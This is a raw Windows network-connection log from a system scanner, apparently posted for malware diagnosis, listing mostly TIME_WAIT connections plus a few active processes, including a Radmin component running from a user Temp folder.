52434	TIME_WAIT	104.69.95.32	80	[0]	x64
52542	TIME_WAIT	192.229.211.108	80	[0]	x64
52573	TIME_WAIT	142.250.190.46	443	[0]	x64
52574	TIME_WAIT	142.250.190.33	443	[0]	x64
52587	TIME_WAIT	13.107.246.38	443	[0]	x64
52590	TIME_WAIT	13.107.246.38	443	[0]	x64
52592	TIME_WAIT	13.107.246.38	443	[0]	x64
52595	TIME_WAIT	13.107.246.38	443	[0]	x64
52596	TIME_WAIT	13.107.246.38	443	[0]	x64
52602	TIME_WAIT	13.107.246.38	443	[0]	x64
52606	TIME_WAIT	13.107.246.38	443	[0]	x64
52607	TIME_WAIT	20.190.155.67	443	[0]	x64
52608	TIME_WAIT	20.118.198.37	443	[0]	x64
52610	TIME_WAIT	13.107.246.38	443	[0]	x64
52611	TIME_WAIT	20.44.10.123	443	[0]	x64
52613	TIME_WAIT	13.107.246.38	443	[0]	x64
52614	TIME_WAIT	13.107.246.38	443	[0]	x64
52615	TIME_WAIT	20.44.10.123	443	[0]	x64
52637	TIME_WAIT	35.227.233.104	443	[0]	x64
52642	ESTABLISHED	52.96.79.114	443	c:\program files (x86)\microsoft\edge\application\msedge.exe [17488] 3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Microsoft Edge	Copyright Microsoft Corporation. All rights reserved.
52643	ESTABLISHED	20.190.155.100	443	c:\program files (x86)\microsoft\edge\application\msedge.exe [17488] 3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Microsoft Edge	Copyright Microsoft Corporation. All rights reserved.
52646	TIME_WAIT	172.217.4.200	443	[0]	x64
52647	TIME_WAIT	35.227.233.104	443	[0]	x64
52649	TIME_WAIT	108.157.150.22	443	[0]	x64
52650	TIME_WAIT	142.250.190.98	443	[0]	x64
52651	TIME_WAIT	108.157.148.226	443	[0]	x64
52653	TIME_WAIT	142.250.191.234	443	[0]	x64
52654	TIME_WAIT	142.250.190.2	443	[0]	x64
52655	TIME_WAIT	142.250.190.68	443	[0]	x64
52656	TIME_WAIT	108.157.142.68	443	[0]	x64
52657	TIME_WAIT	157.240.254.7	443	[0]	x64
52661	TIME_WAIT	204.79.197.200	443	[0]	x64
52662	TIME_WAIT	108.157.147.100	443	[0]	x64
52663	TIME_WAIT	108.157.148.226	443	[0]	x64
52665	TIME_WAIT	3.162.155.32	443	[0]	x64
52666	TIME_WAIT	3.162.155.32	443	[0]	x64
52667	TIME_WAIT	172.67.70.134	443	[0]	x64
52668	TIME_WAIT	142.251.32.16	443	[0]	x64
52669	TIME_WAIT	130.211.23.194	443	[0]	x64
52670	TIME_WAIT	172.217.2.34	443	[0]	x64
52675	TIME_WAIT	104.22.52.86	443	[0]	x64
52676	TIME_WAIT	52.46.128.147	443	[0]	x64
52677	TIME_WAIT	172.67.209.82	443	[0]	x64
52678	TIME_WAIT	172.64.107.32	443	[0]	x64
52679	TIME_WAIT	104.26.3.70	443	[0]	x64
52681	TIME_WAIT	142.250.190.38	443	[0]	x64
52682	TIME_WAIT	172.217.1.110	443	[0]	x64
52683	TIME_WAIT	157.240.254.35	443	[0]	x64
52684	TIME_WAIT	199.127.204.171	443	[0]	x64
52685	TIME_WAIT	216.239.36.181	443	[0]	x64
52686	TIME_WAIT	34.98.64.218	443	[0]	x64
52687	TIME_WAIT	35.71.139.29	443	[0]	x64
52688	TIME_WAIT	142.250.123.155	443	[0]	x64
52691	TIME_WAIT	52.1.59.237	443	[0]	x64
52692	TIME_WAIT	142.250.191.142	443	[0]	x64
52695	TIME_WAIT	52.46.128.147	443	[0]	x64
52696	TIME_WAIT	3.229.139.82	443	[0]	x64
52697	TIME_WAIT	68.67.181.211	443	[0]	x64
52698	TIME_WAIT	35.211.178.172	443	[0]	x64
52701	TIME_WAIT	52.223.40.198	443	[0]	x64
52702	TIME_WAIT	124.146.215.44	443	[0]	x64
52703	TIME_WAIT	142.250.190.98	443	[0]	x64
52704	TIME_WAIT	80.77.87.166	443	[0]	x64
52706	TIME_WAIT	104.36.115.111	443	[0]	x64
52707	TIME_WAIT	68.67.160.24	443	[0]	x64
52710	TIME_WAIT	35.165.116.20	443	[0]	x64
52711	TIME_WAIT	34.107.148.139	443	[0]	x64
52712	TIME_WAIT	104.18.24.185	443	[0]	x64
52714	TIME_WAIT	208.115.232.150	443	[0]	x64
52716	TIME_WAIT	69.173.151.100	443	[0]	x64
52717	TIME_WAIT	104.36.115.113	443	[0]	x64
52718	TIME_WAIT	34.102.146.192	443	[0]	x64
52719	TIME_WAIT	34.96.70.87	443	[0]	x64
52721	TIME_WAIT	172.217.0.161	443	[0]	x64
52723	TIME_WAIT	157.240.254.35	443	[0]	x64
52724	TIME_WAIT	108.157.134.49	443	[0]	x64
52727	TIME_WAIT	35.190.90.30	443	[0]	x64
52728	TIME_WAIT	108.157.142.101	443	[0]	x64
52729	TIME_WAIT	104.18.35.34	443	[0]	x64
52730	TIME_WAIT	34.111.113.62	443	[0]	x64
52731	TIME_WAIT	199.127.204.142	443	[0]	x64
52733	TIME_WAIT	35.190.39.111	443	[0]	x64
52734	TIME_WAIT	69.173.151.100	443	[0]	x64
52735	TIME_WAIT	3.234.5.114	443	[0]	x64
52738	TIME_WAIT	35.169.133.213	443	[0]	x64
52741	ESTABLISHED	49.12.117.51	80	c:\users\isaac\appdata\local\temp\fd369298e4\jweupdater.exe [19352] 833132.36 kb, rsah, created: 05.03.2023 23:23:54, modified: 05.03.2023 23:21:53 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Radmin component	Copyright © 1999-2017 Famatech Corp. and its licensors. All rights reserved.
52742	TIME_WAIT	50.31.142.159	443	[0]	x64
52744	TIME_WAIT	192.184.69.215	443	[0]	x64
52747	TIME_WAIT	8.28.7.83	443	[0]	x64
52749	TIME_WAIT	162.248.18.32	443	[0]	x64
52751	TIME_WAIT	34.171.234.26	443	[0]	x64
52752	TIME_WAIT	162.248.18.37	443	[0]	x64
52753	TIME_WAIT	104.18.25.173	443	[0]	x64
52756	TIME_WAIT	104.18.170.114	443	[0]	x64
52758	TIME_WAIT	142.250.190.98	443	[0]	x64
52759	TIME_WAIT	52.94.220.185	443	[0]	x64
52760	TIME_WAIT	69.173.151.100	443	[0]	x64
52761	TIME_WAIT	88.99.52.179	443	[0]	x64
52762	TIME_WAIT	3.225.218.10	443	[0]	x64
52764	TIME_WAIT	13.107.42.14	443	[0]	x64
52765	TIME_WAIT	104.18.170.114	443	[0]	x64
52767	TIME_WAIT	38.98.139.150	443	[0]	x64
52768	TIME_WAIT	162.248.18.34	443	[0]	x64
52771	TIME_WAIT	141.226.124.48	443	[0]	x64
52772	TIME_WAIT	64.74.236.191	443	[0]	x64
52773	TIME_WAIT	52.44.28.1	443	[0]	x64
52775	TIME_WAIT	104.18.34.10	443	[0]	x64
52776	TIME_WAIT	69.173.151.100	443	[0]	x64
52777	TIME_WAIT	198.148.27.131	443	[0]	x64
52782	TIME_WAIT	141.148.8.2	443	[0]	x64
52783	TIME_WAIT	88.99.52.179	443	[0]	x64
52784	TIME_WAIT	141.148.8.2	443	[0]	x64
52787	TIME_WAIT	142.250.191.225	443	[0]	x64
52789	TIME_WAIT	104.18.11.47	443	[0]	x64
52790	TIME_WAIT	108.157.148.226	443	[0]	x64
52791	TIME_WAIT	142.250.191.225	443	[0]	x64
52792	TIME_WAIT	108.157.150.60	443	[0]	x64
52793	TIME_WAIT	142.250.191.138	443	[0]	x64
52798	TIME_WAIT	142.250.190.2	443	[0]	x64
52799	TIME_WAIT	104.36.115.111	443	[0]	x64
52800	TIME_WAIT	34.107.148.139	443	[0]	x64
52801	TIME_WAIT	35.211.165.203	443	[0]	x64
52802	TIME_WAIT	52.4.33.45	443	[0]	x64
52804	TIME_WAIT	142.250.191.162	443	[0]	x64
52805	TIME_WAIT	172.217.4.195	443	[0]	x64
52808	TIME_WAIT	108.157.142.5	443	[0]	x64
52810	TIME_WAIT	108.157.142.57	443	[0]	x64
52811	TIME_WAIT	23.23.181.143	443	[0]	x64
52812	TIME_WAIT	52.3.164.5	443	[0]	x64
52813	TIME_WAIT	108.157.148.226	443	[0]	x64
52814	TIME_WAIT	142.250.190.132	443	[0]	x64
52815	TIME_WAIT	108.157.150.3	443	[0]	x64
52816	TIME_WAIT	3.162.155.32	443	[0]	x64
52817	TIME_WAIT	3.162.155.32	443	[0]	x64
52818	TIME_WAIT	52.223.40.198	443	[0]	x64
52819	TIME_WAIT	54.224.96.217	443	[0]	x64
52820	TIME_WAIT	35.153.244.124	443	[0]	x64
52821	TIME_WAIT	69.173.151.98	443	[0]	x64
52824	TIME_WAIT	69.173.151.98	443	[0]	x64
52825	TIME_WAIT	172.67.133.7	443	[0]	x64
52826	TIME_WAIT	172.67.133.7	443	[0]	x64
52827	TIME_WAIT	3.211.253.240	443	[0]	x64
52828	TIME_WAIT	142.250.190.98	443	[0]	x64
52830	TIME_WAIT	185.167.164.43	443	[0]	x64
52831	TIME_WAIT	35.186.253.211	443	[0]	x64
52832	TIME_WAIT	52.46.143.56	443	[0]	x64
52833	TIME_WAIT	142.250.191.225	443	[0]	x64
52834	TIME_WAIT	108.157.142.43	443	[0]	x64
52835	TIME_WAIT	8.28.7.84	443	[0]	x64
52836	TIME_WAIT	35.190.80.1	443	[0]	x64
52838	TIME_WAIT	50.112.185.193	443	[0]	x64
52839	TIME_WAIT	108.157.142.43	443	[0]	x64
52840	TIME_WAIT	34.133.71.175	443	[0]	x64
52842	TIME_WAIT	108.157.150.26	443	[0]	x64
52844	TIME_WAIT	3.225.218.10	443	[0]	x64
52845	TIME_WAIT	54.174.190.28	443	[0]	x64
52846	TIME_WAIT	68.67.160.24	443	[0]	x64
52847	TIME_WAIT	198.148.27.131	443	[0]	x64
52848	TIME_WAIT	34.192.43.152	443	[0]	x64
52849	TIME_WAIT	44.207.191.198	443	[0]	x64
52851	TIME_WAIT	205.180.87.140	443	[0]	x64
52853	TIME_WAIT	52.46.143.56	443	[0]	x64
52856	TIME_WAIT	162.248.18.32	443	[0]	x64
52857	TIME_WAIT	52.46.143.56	443	[0]	x64
52858	TIME_WAIT	80.77.87.166	443	[0]	x64
52859	TIME_WAIT	35.71.139.29	443	[0]	x64
52863	TIME_WAIT	34.236.12.197	443	[0]	x64
52864	TIME_WAIT	64.202.112.95	443	[0]	x64
52865	TIME_WAIT	52.46.143.56	443	[0]	x64
52866	TIME_WAIT	52.46.143.56	443	[0]	x64
52867	TIME_WAIT	54.200.49.142	443	[0]	x64
52869	TIME_WAIT	52.46.143.56	443	[0]	x64
52876	TIME_WAIT	52.223.40.198	443	[0]	x64
52877	TIME_WAIT	34.111.113.62	443	[0]	x64
52878	TIME_WAIT	142.250.190.98	443	[0]	x64
52881	TIME_WAIT	3.226.99.159	443	[0]	x64
52882	TIME_WAIT	35.244.159.8	443	[0]	x64
52883	TIME_WAIT	199.127.204.171	443	[0]	x64
52884	TIME_WAIT	199.127.204.171	443	[0]	x64
52886	TIME_WAIT	52.223.40.198	443	[0]	x64
52890	TIME_WAIT	52.223.40.198	443	[0]	x64
52894	TIME_WAIT	18.223.55.169	443	[0]	x64
52895	TIME_WAIT	35.211.178.172	443	[0]	x64
52896	TIME_WAIT	159.127.41.105	443	[0]	x64
52897	TIME_WAIT	35.207.24.140	443	[0]	x64
52899	TIME_WAIT	104.26.2.146	443	[0]	x64
52902	TIME_WAIT	35.190.60.146	443	[0]	x64
52904	TIME_WAIT	69.173.151.100	443	[0]	x64
52908	TIME_WAIT	35.211.178.172	443	[0]	x64
52909	TIME_WAIT	35.211.178.172	443	[0]	x64
52912	TIME_WAIT	35.211.178.172	443	[0]	x64
52914	TIME_WAIT	216.200.232.253	443	[0]	x64
52915	TIME_WAIT	216.200.232.253	443	[0]	x64
52916	TIME_WAIT	69.173.151.100	443	[0]	x64
52917	TIME_WAIT	69.173.151.100	443	[0]	x64
52918	TIME_WAIT	38.98.139.150	443	[0]	x64
52920	TIME_WAIT	8.2.110.134	443	[0]	x64
52924	TIME_WAIT	35.153.173.92	443	[0]	x64
52925	TIME_WAIT	199.38.167.131	443	[0]	x64
52926	TIME_WAIT	69.173.151.100	443	[0]	x64
52927	TIME_WAIT	52.44.28.1	443	[0]	x64
52928	TIME_WAIT	205.180.86.172	443	[0]	x64
52929	TIME_WAIT	69.173.151.100	443	[0]	x64
52930	TIME_WAIT	52.46.143.56	443	[0]	x64
52931	TIME_WAIT	107.178.254.65	443	[0]	x64
52933	TIME_WAIT	159.127.41.204	443	[0]	x64
52934	TIME_WAIT	213.19.162.90	443	[0]	x64
52935	TIME_WAIT	213.19.162.90	443	[0]	x64
52936	TIME_WAIT	52.46.143.56	443	[0]	x64
52937	TIME_WAIT	108.157.142.63	443	[0]	x64
52938	TIME_WAIT	52.5.143.9	443	[0]	x64
52943	TIME_WAIT	34.237.249.31	443	[0]	x64
52944	TIME_WAIT	64.202.112.95	443	[0]	x64
52946	TIME_WAIT	69.173.151.100	443	[0]	x64
52947	TIME_WAIT	69.173.151.100	443	[0]	x64
52950	TIME_WAIT	192.132.33.46	443	[0]	x64
52952	TIME_WAIT	13.107.42.14	443	[0]	x64
52953	TIME_WAIT	18.232.29.29	443	[0]	x64
52958	TIME_WAIT	199.127.204.142	443	[0]	x64
52960	TIME_WAIT	204.62.13.72	443	[0]	x64
52961	TIME_WAIT	8.2.110.33	443	[0]	x64
52962	TIME_WAIT	50.57.31.206	443	[0]	x64
52964	TIME_WAIT	52.46.143.56	443	[0]	x64
52965	TIME_WAIT	69.173.151.100	443	[0]	x64
52966	TIME_WAIT	52.3.164.5	443	[0]	x64
52967	TIME_WAIT	185.167.164.39	443	[0]	x64
52968	TIME_WAIT	185.167.164.39	443	[0]	x64
52969	TIME_WAIT	69.173.151.100	443	[0]	x64
52970	TIME_WAIT	199.127.204.142	443	[0]	x64
52971	TIME_WAIT	104.18.28.38	443	[0]	x64
52973	TIME_WAIT	104.18.10.47	443	[0]	x64
52975	TIME_WAIT	162.55.233.29	443	[0]	x64
52978	TIME_WAIT	52.46.128.147	443	[0]	x64
52980	TIME_WAIT	50.17.102.50	443	[0]	x64
52985	TIME_WAIT	199.38.167.130	443	[0]	x64
52987	TIME_WAIT	142.250.190.33	443	[0]	x64
52989	TIME_WAIT	104.26.9.50	443	[0]	x64
52991	TIME_WAIT	199.127.204.171	443	[0]	x64
52992	TIME_WAIT	64.74.236.191	443	[0]	x64
52996	TIME_WAIT	35.207.24.140	443	[0]	x64
52998	TIME_WAIT	54.174.190.28	443	[0]	x64
53000	TIME_WAIT	204.62.13.72	443	[0]	x64
53003	TIME_WAIT	34.208.210.191	443	[0]	x64
53005	TIME_WAIT	35.211.178.172	443	[0]	x64
53007	TIME_WAIT	64.74.236.191	443	[0]	x64
53008	TIME_WAIT	69.173.151.100	443	[0]	x64
53010	TIME_WAIT	44.207.191.198	443	[0]	x64
53011	TIME_WAIT	23.23.226.41	443	[0]	x64
53012	TIME_WAIT	35.211.178.172	443	[0]	x64
53014	TIME_WAIT	199.127.204.171	443	[0]	x64
53015	TIME_WAIT	198.54.12.145	443	[0]	x64
53016	TIME_WAIT	199.127.204.142	443	[0]	x64
53017	TIME_WAIT	44.197.37.250	443	[0]	x64
53019	TIME_WAIT	74.121.140.211	443	[0]	x64
53025	TIME_WAIT	173.231.184.20	443	[0]	x64
53026	TIME_WAIT	54.147.253.182	443	[0]	x64
53027	TIME_WAIT	82.145.213.8	443	[0]	x64
53028	TIME_WAIT	34.231.29.114	443	[0]	x64
53029	TIME_WAIT	107.23.55.247	443	[0]	x64
53030	TIME_WAIT	35.190.60.146	443	[0]	x64
53034	TIME_WAIT	38.68.201.140	443	[0]	x64
53035	TIME_WAIT	64.74.236.255	443	[0]	x64
53038	TIME_WAIT	139.45.240.92	443	[0]	x64
53039	TIME_WAIT	69.173.151.100	443	[0]	x64
53040	TIME_WAIT	35.211.178.172	443	[0]	x64
53041	TIME_WAIT	142.250.191.130	443	[0]	x64
53043	TIME_WAIT	44.207.72.204	443	[0]	x64
53045	TIME_WAIT	141.226.124.48	443	[0]	x64
53046	TIME_WAIT	52.1.17.31	443	[0]	x64
53049	TIME_WAIT	35.71.139.29	443	[0]	x64
53050	TIME_WAIT	3.225.218.10	443	[0]	x64
53051	TIME_WAIT	124.146.215.44	443	[0]	x64
53053	TIME_WAIT	38.98.139.150	443	[0]	x64
53054	TIME_WAIT	34.117.157.22	443	[0]	x64
53055	TIME_WAIT	52.44.28.1	443	[0]	x64
53056	TIME_WAIT	44.214.127.118	443	[0]	x64
53057	TIME_WAIT	44.196.89.168	443	[0]	x64
53060	TIME_WAIT	52.223.40.198	443	[0]	x64
53061	TIME_WAIT	50.112.185.193	443	[0]	x64
53062	TIME_WAIT	50.31.142.159	443	[0]	x64
53063	TIME_WAIT	104.36.113.107	443	[0]	x64
53065	TIME_WAIT	107.178.254.65	443	[0]	x64
53066	TIME_WAIT	18.208.66.145	443	[0]	x64
53068	TIME_WAIT	108.157.142.94	443	[0]	x64
53070	TIME_WAIT	38.98.139.150	443	[0]	x64
53071	TIME_WAIT	35.190.60.146	443	[0]	x64
53075	TIME_WAIT	69.173.151.100	443	[0]	x64
53076	TIME_WAIT	38.98.139.150	443	[0]	x64
53077	TIME_WAIT	3.214.207.4	443	[0]	x64
53078	TIME_WAIT	108.157.142.90	443	[0]	x64
53079	TIME_WAIT	38.98.139.150	443	[0]	x64
53081	TIME_WAIT	192.184.69.252	443	[0]	x64
53082	TIME_WAIT	38.98.139.150	443	[0]	x64
53083	TIME_WAIT	52.116.53.150	443	[0]	x64
53084	TIME_WAIT	64.74.236.191	443	[0]	x64
53085	TIME_WAIT	34.117.26.124	443	[0]	x64
53087	TIME_WAIT	3.135.132.32	443	[0]	x64
53088	TIME_WAIT	173.231.178.83	443	[0]	x64
53089	TIME_WAIT	38.98.139.150	443	[0]	x64
53090	TIME_WAIT	199.38.167.130	443	[0]	x64
53092	TIME_WAIT	38.98.139.150	443	[0]	x64
53093	TIME_WAIT	35.227.233.104	443	[0]	x64
53097	TIME_WAIT	199.127.204.171	443	[0]	x64
53098	TIME_WAIT	34.102.163.6	443	[0]	x64
53099	TIME_WAIT	34.171.234.26	443	[0]	x64
53102	TIME_WAIT	35.186.193.173	443	[0]	x64
53104	TIME_WAIT	172.104.70.67	443	[0]	x64
53105	TIME_WAIT	34.102.253.54	443	[0]	x64
53109	TIME_WAIT	35.175.166.208	443	[0]	x64
53112	TIME_WAIT	104.36.115.113	443	[0]	x64
53113	TIME_WAIT	162.248.18.37	443	[0]	x64
53115	TIME_WAIT	69.173.151.100	443	[0]	x64
53116	TIME_WAIT	8.28.7.83	443	[0]	x64
53117	TIME_WAIT	172.104.70.67	443	[0]	x64
53118	TIME_WAIT	3.137.121.12	443	[0]	x64
53120	TIME_WAIT	35.169.133.213	443	[0]	x64
53122	TIME_WAIT	8.28.7.84	443	[0]	x64
53125	TIME_WAIT	35.227.233.104	443	[0]	x64
53129	TIME_WAIT	204.79.197.200	443	[0]	x64
53132	TIME_WAIT	108.157.148.226	443	[0]	x64
53133	TIME_WAIT	108.157.150.22	443	[0]	x64
53134	TIME_WAIT	108.157.142.68	443	[0]	x64
53136	TIME_WAIT	172.67.70.134	443	[0]	x64
53137	TIME_WAIT	108.157.142.16	443	[0]	x64
53138	TIME_WAIT	3.162.155.32	443	[0]	x64
53139	TIME_WAIT	3.162.155.32	443	[0]	x64
53140	TIME_WAIT	108.157.148.226	443	[0]	x64
53144	TIME_WAIT	104.26.3.70	443	[0]	x64
53145	TIME_WAIT	108.157.142.63	443	[0]	x64
53146	TIME_WAIT	108.157.150.75	443	[0]	x64
53149	TIME_WAIT	52.57.87.82	443	[0]	x64
53153	TIME_WAIT	108.157.150.111	443	[0]	x64
53156	TIME_WAIT	108.157.150.75	443	[0]	x64
53157	TIME_WAIT	141.148.8.2	443	[0]	x64
53159	TIME_WAIT	172.217.0.161	443	[0]	x64
53160	TIME_WAIT	108.157.142.101	443	[0]	x64
53161	TIME_WAIT	108.157.142.16	443	[0]	x64
53162	TIME_WAIT	108.157.142.29	443	[0]	x64
53163	TIME_WAIT	3.234.5.114	443	[0]	x64
53164	TIME_WAIT	108.157.150.90	443	[0]	x64
53165	TIME_WAIT	35.190.60.146	443	[0]	x64
53166	TIME_WAIT	108.157.150.17	443	[0]	x64
53168	TIME_WAIT	52.223.40.198	443	[0]	x64
53169	TIME_WAIT	52.223.40.198	443	[0]	x64
53170	TIME_WAIT	3.225.218.10	443	[0]	x64
53171	TIME_WAIT	172.217.4.74	443	[0]	x64
53174	TIME_WAIT	37.157.3.20	443	[0]	x64
53176	TIME_WAIT	108.157.150.15	443	[0]	x64
53178	TIME_WAIT	52.116.53.150	443	[0]	x64
53181	TIME_WAIT	172.217.0.170	443	[0]	x64
53184	TIME_WAIT	172.217.2.38	443	[0]	x64
53192	TIME_WAIT	172.217.4.34	443	[0]	x64
53203	TIME_WAIT	142.250.190.2	443	[0]	x64
53205	TIME_WAIT	3.229.139.82	443	[0]	x64
53207	TIME_WAIT	34.96.105.8	443	[0]	x64
53210	TIME_WAIT	142.250.191.162	443	[0]	x64
53211	TIME_WAIT	142.250.112.120	443	[0]	x64
53213	TIME_WAIT	142.251.172.155	443	[0]	x64
53218	TIME_WAIT	104.18.28.58	443	[0]	x64
53219	TIME_WAIT	35.170.92.37	443	[0]	x64
53220	TIME_WAIT	23.23.183.246	443	[0]	x64
53223	TIME_WAIT	172.217.2.33	443	[0]	x64
53224	TIME_WAIT	74.125.9.70	443	[0]	x64
53225	TIME_WAIT	172.217.2.46	443	[0]	x64
53230	TIME_WAIT	199.127.204.171	443	[0]	x64
53231	TIME_WAIT	199.38.167.131	443	[0]	x64
53233	TIME_WAIT	142.250.190.38	443	[0]	x64
53242	TIME_WAIT	18.160.249.3	443	[0]	x64
53243	TIME_WAIT	104.36.115.111	443	[0]	x64
53244	TIME_WAIT	34.107.148.139	443	[0]	x64
53245	TIME_WAIT	208.115.232.150	443	[0]	x64
53246	TIME_WAIT	35.165.116.20	443	[0]	x64
53248	TIME_WAIT	54.166.65.208	443	[0]	x64
53250	TIME_WAIT	34.111.113.62	443	[0]	x64
53252	TIME_WAIT	142.250.190.78	443	[0]	x64
53257	TIME_WAIT	3.219.61.138	443	[0]	x64
53258	TIME_WAIT	142.250.190.142	443	[0]	x64
53259	TIME_WAIT	107.178.254.65	443	[0]	x64
53264	TIME_WAIT	108.157.150.103	443	[0]	x64
53266	TIME_WAIT	35.190.43.134	443	[0]	x64
53267	TIME_WAIT	35.227.192.142	443	[0]	x64
53269	TIME_WAIT	199.38.167.130	443	[0]	x64
53270	TIME_WAIT	108.157.142.90	443	[0]	x64
53272	TIME_WAIT	205.180.86.204	443	[0]	x64
53281	TIME_WAIT	192.132.33.46	443	[0]	x64
53282	TIME_WAIT	172.217.0.162	443	[0]	x64
53283	TIME_WAIT	185.167.164.43	443	[0]	x64
53286	TIME_WAIT	50.57.31.206	443	[0]	x64
53287	TIME_WAIT	3.225.218.10	443	[0]	x64
53290	TIME_WAIT	3.225.218.10	443	[0]	x64
53292	TIME_WAIT	104.22.68.131	443	[0]	x64
53293	TIME_WAIT	35.211.178.172	443	[0]	x64
53294	TIME_WAIT	213.19.162.80	443	[0]	x64
53295	TIME_WAIT	159.127.41.108	443	[0]	x64
53300	TIME_WAIT	44.214.127.118	443	[0]	x64
53302	TIME_WAIT	104.36.115.113	443	[0]	x64
53304	TIME_WAIT	185.167.164.37	443	[0]	x64
53306	TIME_WAIT	52.1.59.237	443	[0]	x64
53309	TIME_WAIT	74.121.140.211	443	[0]	x64
53310	TIME_WAIT	52.138.124.216	443	[0]	x64
53311	TIME_WAIT	13.89.179.10	443	[0]	x64
53315	TIME_WAIT	35.211.178.172	443	[0]	x64
53316	TIME_WAIT	52.1.17.31	443	[0]	x64
53318	TIME_WAIT	69.173.151.100	443	[0]	x64
53321	TIME_WAIT	35.71.139.29	443	[0]	x64
53323	TIME_WAIT	44.207.72.204	443	[0]	x64
53324	TIME_WAIT	141.226.124.48	443	[0]	x64
53325	TIME_WAIT	52.44.28.1	443	[0]	x64
53326	TIME_WAIT	44.196.89.168	443	[0]	x64
53327	TIME_WAIT	34.102.166.132	443	[0]	x64
53328	TIME_WAIT	52.2.160.177	443	[0]	x64
53331	TIME_WAIT	34.192.43.152	443	[0]	x64
53334	TIME_WAIT	38.98.139.150	443	[0]	x64
53336	TIME_WAIT	34.170.123.2	443	[0]	x64
53338	TIME_WAIT	52.46.143.56	443	[0]	x64
53340	TIME_WAIT	104.19.136.78	443	[0]	x64
53341	TIME_WAIT	108.156.91.120	443	[0]	x64
53342	TIME_WAIT	185.167.164.49	443	[0]	x64
53344	TIME_WAIT	216.239.32.21	443	[0]	x64
53352	TIME_WAIT	159.127.41.105	443	[0]	x64
53353	ESTABLISHED	31.13.93.49	443	d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136] 8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
53354	ESTABLISHED	31.13.93.49	443	d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136] 8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
53355	TIME_WAIT	54.147.94.189	443	[0]	x64
53356	TIME_WAIT	104.18.25.173	443	[0]	x64
53357	TIME_WAIT	35.244.210.213	443	[0]	x64
53358	TIME_WAIT	50.57.31.206	443	[0]	x64
53362	TIME_WAIT	172.217.4.34	443	[0]	x64
53370	TIME_WAIT	159.127.41.204	443	[0]	x64
53374	TIME_WAIT	18.232.29.29	443	[0]	x64
53376	TIME_WAIT	104.22.17.141	443	[0]	x64
53377	TIME_WAIT	54.167.64.228	443	[0]	x64
53379	TIME_WAIT	108.157.142.90	443	[0]	x64
53380	TIME_WAIT	108.157.142.49	443	[0]	x64
53381	TIME_WAIT	35.244.159.8	443	[0]	x64
53383	ESTABLISHED	23.220.102.24	443	c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe [5312] 6992.35 kb, rsAh, created: 29.04.2020 11:57:29, modified: 21.07.2023 14:04:22 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam Client WebHelper	Copyright (C) 2014 Valve Corporation
53394	TIME_WAIT	34.117.228.201	443	[0]	x64
53395	TIME_WAIT	142.250.190.98	443	[0]	x64
53396	TIME_WAIT	34.111.234.236	443	[0]	x64
53397	TIME_WAIT	35.195.81.176	443	[0]	x64
53399	TIME_WAIT	18.233.161.105	443	[0]	x64
53400	TIME_WAIT	68.67.179.166	443	[0]	x64
53410	SYN_SENT	13.248.148.254	443	c:\program files (x86)\bookingdesktopapp\update\bookingdesktopappupdate.exe [25520] 100.00 kb, rsAh, created: 29.09.2020 19:53:40, modified: 29.09.2020 19:53:39 Script: Quarantine, Delete, Delete via BC, Terminate	x64		bookingDesktopApp Update	Copyright 2007-2010 Google Inc.
53412	TIME_WAIT	185.89.210.59	443	[0]	x64
53418	TIME_WAIT	68.67.160.24	443	[0]	x64
53419	TIME_WAIT	104.36.115.111	443	[0]	x64
53420	TIME_WAIT	52.4.33.45	443	[0]	x64
53421	TIME_WAIT	35.211.165.203	443	[0]	x64
53423	TIME_WAIT	69.173.151.98	443	[0]	x64
53424	TIME_WAIT	34.107.148.139	443	[0]	x64
53426	TIME_WAIT	141.148.8.2	443	[0]	x64
53427	TIME_WAIT	3.162.155.32	443	[0]	x64
53428	TIME_WAIT	141.148.8.2	443	[0]	x64
53429	TIME_WAIT	23.23.181.143	443	[0]	x64
53430	TIME_WAIT	52.3.164.5	443	[0]	x64
53431	TIME_WAIT	108.157.150.3	443	[0]	x64
53432	TIME_WAIT	104.36.115.111	443	[0]	x64
53434	TIME_WAIT	18.207.40.31	443	[0]	x64
53435	TIME_WAIT	108.157.142.5	443	[0]	x64
53437	TIME_WAIT	35.186.241.3	443	[0]	x64
53441	TIME_WAIT	108.157.150.34	443	[0]	x64
53442	TIME_WAIT	172.217.4.200	443	[0]	x64
53443	TIME_WAIT	108.157.150.25	443	[0]	x64
53444	TIME_WAIT	142.250.191.162	443	[0]	x64
53447	TIME_WAIT	104.22.55.232	443	[0]	x64
53448	TIME_WAIT	108.157.150.32	443	[0]	x64
53449	TIME_WAIT	142.250.190.98	443	[0]	x64
53451	TIME_WAIT	108.157.142.68	443	[0]	x64
53453	TIME_WAIT	142.250.191.162	443	[0]	x64
53454	TIME_WAIT	52.84.106.61	443	[0]	x64
53455	TIME_WAIT	142.250.190.2	443	[0]	x64
53456	TIME_WAIT	142.250.190.98	443	[0]	x64
53457	TIME_WAIT	108.157.148.226	443	[0]	x64
53459	TIME_WAIT	108.157.148.226	443	[0]	x64
53460	TIME_WAIT	104.26.7.139	443	[0]	x64
53462	TIME_WAIT	108.157.147.100	443	[0]	x64
53465	TIME_WAIT	142.250.191.206	443	[0]	x64
53466	TIME_WAIT	130.211.23.194	443	[0]	x64
53467	TIME_WAIT	172.217.1.110	443	[0]	x64
53468	TIME_WAIT	142.251.32.16	443	[0]	x64
53469	TIME_WAIT	142.250.190.38	443	[0]	x64
53470	TIME_WAIT	104.22.52.86	443	[0]	x64
